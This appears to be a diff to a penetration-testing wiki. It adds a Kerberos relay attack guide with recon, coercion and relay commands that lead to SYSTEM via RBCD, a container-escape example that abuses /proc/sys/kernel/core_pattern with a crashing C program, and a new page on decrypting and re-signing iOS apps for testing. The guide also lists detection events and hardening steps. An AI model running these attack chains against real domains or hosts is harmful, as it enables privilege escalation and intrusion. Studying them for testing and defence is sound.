a

src/SUMMARY.md

@@ -343,6 +343,7 @@
   - [iOS Extracting Entitlements From Compiled Application](mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md)
   - [iOS Frida Configuration](mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md)
   - [iOS Hooking With Objection](mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md)
+  - [iOS Pentesting withuot Jailbreak](mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md)
   - [iOS Protocol Handlers](mobile-pentesting/ios-pentesting/ios-protocol-handlers.md)
   - [iOS Serialisation and Encoding](mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md)
   - [iOS Testing Environment](mobile-pentesting/ios-pentesting/ios-testing-environment.md)

src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md

@@ -123,6 +123,118 @@ In Windows you **may be able to force some privileged accounts to authenticate t
 ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
 {{#endref}}
 
+## Kerberos Relay attack
+
+A **Kerberos relay attack** steals an **AP-REQ ticket** from one service and re-uses it against a second service that shares the **same computer-account key** (because both SPNs sit on the same `$` machine account). This works even though the SPNs’ **service classes differ** (e.g. `CIFS/` → `LDAP/`) because the *key* that decrypts the ticket is the machine’s NT hash, not the SPN string itself and the SPN string is not part of the signature.
+
+Unlike NTLM relay, the hop is limited to the *same host* but, if you target a protocol that lets you write to LDAP, you can chain into **Resource-Based Constrained Delegation (RBCD)** or **AD CS enrollment** and pop **NT AUTHORITY\SYSTEM** in a single shot.
+
+For detailed info about this attack check:
+
+- [https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html](https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html)
+- [https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/](https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/)
+
+- 1. **Kerberos basics**
+
+| Token | Purpose | Relay relevance |
+|-------|---------|-----------------|
+| **TGT / AS-REQ ↔ REP** | Proves the user to the KDC | untouched |
+| **Service ticket / TGS-REQ ↔ REP** | Bound to one **SPN**; encrypted with the SPN owner’s key | interchangeable if SPNs share account |
+| **AP-REQ** | Client sends `TGS` to the service | **what we steal & replay** |
+
+* Tickets are encrypted with the **password-derived key of the account that owns the SPN**.  
+* The **Authenticator** inside the AP-REQ has a 5-minute timestamp; replay inside that window is valid until the service cache sees a duplicate.  
+* Windows rarely checks if the SPN string in the ticket matches the service you hit, so a ticket for `CIFS/HOST` normally decrypts fine on `LDAP/HOST`.
+
+- 2. **What must be true to relay Kerberos**
+
+1. **Shared key:** source and target SPNs belong to the same computer account (default on Windows servers).  
+2. **No channel protection:** SMB/LDAP signing off and EPA off for HTTP/LDAPS.  
+3. **You can intercept or coerce authentication:** LLMNR/NBNS poison, DNS spoof, **PetitPotam / DFSCoerce RPC**, fake AuthIP, rogue DCOM, etc..  
+4. **Ticket source not already used:** you win the race before the real packet hits or block it entirely; otherwise the server’s replay cache fires Event 4649.
+5. You need to somehow be able to perform a **MitM in the communication** maybe being part of the DNSAmins group to modify the DNS of the domain or being able to change the HOST file of the victim.
+
+### Kerberos Relay Steps
+
+- 3.1 **Recon the host**
+
+```powershell
+# find servers where HTTP, LDAP or CIFS share the same machine account
+Get-ADComputer -Filter * -Properties servicePrincipalName |
+  Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
+  Select Name,servicePrincipalName
+```
+
+- 3.2 **Start the relay listener**
+
+[KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp)
+
+```powershell
+# one-click local SYSTEM via RBCD
+.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8
+```
+`KrbRelayUp` wraps **KrbRelay → LDAP → RBCD → Rubeus → SCM bypass** in one binary.
+
+- 3.3 **Coerce Kerberos auth**
+
+```powershell
+# coerce DC to auth over SMB with DFSCoerce
+.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50
+```
+DFSCoerce makes the DC send a Kerberos `CIFS/DC01` ticket to us.
+
+- 3.4 **Relay the AP-REQ**
+
+KrbRelay extracts the GSS blob from SMB, repackages it into an LDAP bind, and forwards it to `ldap://DC01`—authentication succeeds because the **same key** decrypts it.
+
+- 3.5 **Abuse LDAP ➜ RBCD ➜ SYSTEM**
+
+```powershell
+# (auto inside KrbRelayUp) manual for clarity
+New-MachineAccount -Name "FAKE01" -Password "P@ss123"
+KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
+Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
+SCMUACBypass.exe
+```
+You now own **NT AUTHORITY\SYSTEM**.
+
+
+### **More paths worth knowing**
+
+| Vector | Trick | Why it matters |
+|--------|-------|----------------|
+| **AuthIP / IPSec** | Fake server sends a **GSS-ID payload** with any SPN; client builds an AP-REQ straight to you | Works even across subnets; machine creds by default |
+| **DCOM / MSRPC** | Malicious OXID resolver forces client to auth to arbitrary SPN and port | Pure *local* priv-esc; sidesteps firewall |
+| **AD CS Web Enroll** | Relay machine ticket to `HTTP/CA` and get a cert, then **PKINIT** to mint TGTs | Bypasses LDAP signing defenses |
+| **Shadow Credentials** | Write `msDS-KeyCredentialLink`, then PKINIT with forged key pair | No need to add a computer account |
+
+### **Troubleshooting**
+
+| Error | Meaning | Fix |
+|-------|---------|-----|
+| `KRB_AP_ERR_MODIFIED` | Ticket key ≠ target key | Wrong host/SPN |
+| `KRB_AP_ERR_SKEW` | Clock > 5 min offset | Sync time or use `w32tm` |
+| LDAP bind fails | Signing enforced | Use AD CS path or disable signing |
+| Event 4649 spam | Service saw duplicate Authenticator | block or race original packet |
+
+
+### **Detection**
+
+* Surge in **Event 4769** for `CIFS/`, `HTTP/`, `LDAP/` from the same source within seconds.  
+* **Event 4649** on the service indicates replay detected.  
+* Kerberos logon from **127.0.0.1** (relay to local SCM) is highly suspicious—map via Sigma rule in KrbRelayUp docs.  
+* Watch changes to `msDS-AllowedToActOnBehalfOfOtherIdentity` or `msDS-KeyCredentialLink` attributes.
+
+## **Hardening**
+
+1. **Enforce LDAP & SMB signing + EPA** on every server.  
+2. **Split SPNs** so HTTP isn’t on the same account as CIFS/LDAP.  
+3. Patch coercion vectors (PetitPotam KB5005413, DFS, AuthIP).  
+4. Set **`ms-DS-MachineAccountQuota = 0`** to stop rogue computer joins.  
+5. Alert on **Event 4649** and unexpected loopback Kerberos logons.
+
+
+
 ## References
 
 - [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)

src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md

@@ -15,15 +15,31 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
 #### **`/proc/sys/kernel/core_pattern`**
 
 - Described in [core(5)](https://man7.org/linux/man-pages/man5/core.5.html).
-- Allows defining a program to execute on core-file generation with the first 128 bytes as arguments. This can lead to code execution if the file begins with a pipe `|`.
+- If you can write inside this file it's possible to write a pipe `|` followed by the path to a program or script that will be exuted after a crash happens.
+-  An attacker can find the path inside the host to his container executing `mount` and write the path to a binary inside his container file system. Then, crash a program to make the kernel execute the binary outside of the container.
+
 - **Testing and Exploitation Example**:
 
-  ```bash
-  [ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access
-  cd /proc/sys/kernel
-  echo "|$overlay/shell.sh" > core_pattern # Set custom handler
-  sleep 5 && ./crash & # Trigger handler
-  ```
+```bash
+[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access
+cd /proc/sys/kernel
+echo "|$overlay/shell.sh" > core_pattern # Set custom handler
+sleep 5 && ./crash & # Trigger handler
+```
+
+Check [this post](https://pwning.systems/posts/escaping-containers-for-fun/) for more information.
+
+Example program taht crashes:
+
+```c
+int main(void) {
+	char buf[1];
+	for (int i = 0; i < 100; i++) {
+		buf[i] = 1;
+	}
+	return 0;
+}
+```
 
 #### **`/proc/sys/kernel/modprobe`**
 

src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md

@@ -0,0 +1,87 @@
+# iOS Pentesting without Jailbreak
+
+{{#include ../../banners/hacktricks-training.md}}
+
+
+## Main idea
+
+Applications signed with the **entitlement `get_task_allow`** allow third party applications to run a function called **`task_for_pid()`** with the process ID of the initial application as argument in order to get the task port over it (be able to control it and access it's memory).
+
+However, it’s not as easy as just pulling the IPA, re-signing it with the entitlement, and flashing it back to your device. This is becasue of FairPlay protection. When the signature of the app changes, the DRM (Digital Rights Management) key is **invalidated and the app won't work**.
+
+With an old jailbroken device, it's possible to install the IPA, **decrypt it using your favourite tool** (such as Iridium or frida-ios-dump), and pulling it back off the device. Although, if possible, it's recommended to just as the client for the decrypted IPA.
+
+
+## Obtain decrypted IPA
+
+### Get it from Apple
+
+1. Install the app to pentest in the iPhone
+2. Install and launch [Apple Configurator](https://apps.apple.com/au/app/apple-configurator/id1037126344?mt=12) inside your macos
+3. Open `Terminal `on your Mac, and cd to `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`. The IPA will appear in this folder later.
+4. You should see your iOS device. Double-click on it, and then click Add + → Apps from the top menu bar.
+5. After clicking Add, Configurator will download the IPA from Apple, and attempt to push it to your device. If you followed my recommendation earlier and installed the IPA already, a prompt asking you to reinstall the app will appear.
+6. The IPA should be downloaded inside `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`from where you can grab it
+
+Check [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed) for more detailed information about this process.
+
+
+### Decrypting the app
+
+In order to decrypt the IPA we are going to install it. However, if you have an old jailbroken iPhone, potentailly it's version is not going to be supported by the application as usually apps only suports latests versions.
+
+So, in order to install it, just unzip the IPA:
+
+```bash
+unzip redacted.ipa -d unzipped
+```
+
+Check the `Info.plist` for the minimum supported versiona nd if your device is older than that, change the value so it's supported.
+
+Zip back the IPA:
+
+```bash
+cd unzipped
+zip -r ../no-min-version.ipa *
+```
+
+Then, install the IPA for example with:
+
+```bash
+ideviceinstaller -i no-min-version.ipa -w
+```
+
+Note that you might need **AppSync Unified tweak** from Cydia to prevent any `invalid signature` errors.
+
+Once intalled, you can use **Iridium tweak** from Cydia in order to obtain the decrypted IPA.
+
+
+### Patch entitlements & re-sign
+
+In order to re-sign the application with the `get-task-allow` entitlement there are several tools available like `app-signer`, `codesign`, and `iResign`. `app-signer` has a very user-friendly interface that allows to very easily resing an IPA file indicating the IPA to re-sign, to **put it `get-taks-allow`** and the certificate and provisioning profile to use.
+
+Regarding the certificate and signing profiles, Apple offers **free developer signing profiles** for all accounts through Xcode. Just create an app and configure one. Then, configure the **iPhone to trust the developer apps** by navigating to `Settings` → `Privacy & Security`, and click on `Developer Mode`.
+
+
+With the re-signed IPA, it's time to install it in the device to pentest it:
+
+```bash
+ideviceinstaller -i resigned.ipa -w
+```
+
+### Hook
+
+You could easily hook your app using common tools like frida an objection:
+
+```bash
+objection -g [your app bundle ID] explore
+
+```
+
+
+## References
+
+- [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed)
+
+
+{{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/ios-pentesting/ios-testing-environment.md

@@ -56,7 +56,11 @@ Corellium is the only publicly available iOS emulator. It is an enterprise SaaS
 
 ## No Jailbreak needed
 
-Check this blog post about how to pentest an iOS application in a **non jailbroken device**: [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed)
+Check this blog post about how to pentest an iOS application in a **non jailbroken device**:
+
+{{#ref}}
+ios-pentesting-without-jailbreak.md
+{{#endref}}
 
 ## Jailbreaking